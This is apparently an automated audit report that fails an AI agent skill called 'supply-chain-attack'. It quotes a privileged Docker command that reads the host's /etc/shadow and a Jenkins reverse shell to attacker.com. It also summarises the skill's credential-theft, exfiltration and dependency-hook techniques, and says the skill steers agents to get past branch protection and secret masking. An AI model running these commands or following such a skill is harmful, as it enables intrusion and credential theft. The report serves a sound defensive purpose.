supply-chain-attack

Fail

Audited by Gen Agent Trust Hub on Apr 22, 2026

Risk Level: HIGH
COMMAND_EXECUTION, DATA_EXFILTRATION, REMOTE_CODE_EXECUTION, CREDENTIALS_UNSAFE
Full Analysis
  • [COMMAND_EXECUTION]: The skill provides functional templates for executing highly dangerous commands, including Docker container escapes (docker run -v /:/host --privileged alpine cat /host/etc/shadow) and mounting host filesystems to read sensitive system files.
  • [DATA_EXFILTRATION]: Extensive instructions and code snippets are provided for exfiltrating sensitive data. This includes techniques for sending environment variables, GITHUB_TOKENs, and SSH keys to external servers via HTTP POST requests and DNS exfiltration patterns.
  • [REMOTE_CODE_EXECUTION]: The skill contains a functional reverse shell payload within the Jenkins Script Console section (['bash', '-c', 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'].execute()). It also teaches how to achieve RCE through malicious dependency hooks like npm 'preinstall' and Python 'setup.py'.
  • [CREDENTIALS_UNSAFE]: The documentation explicitly guides the agent to locate and extract sensitive credentials, including AWS keys, Kubernetes configs, and private SSH keys from local filesystems and CI/CD environment variables.
  • [PROMPT_INJECTION]: The skill provides instructions for the agent to generate code that deliberately bypasses security controls, such as branch protection rules and CI/CD secret masking.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Apr 22, 2026, 10:08 AM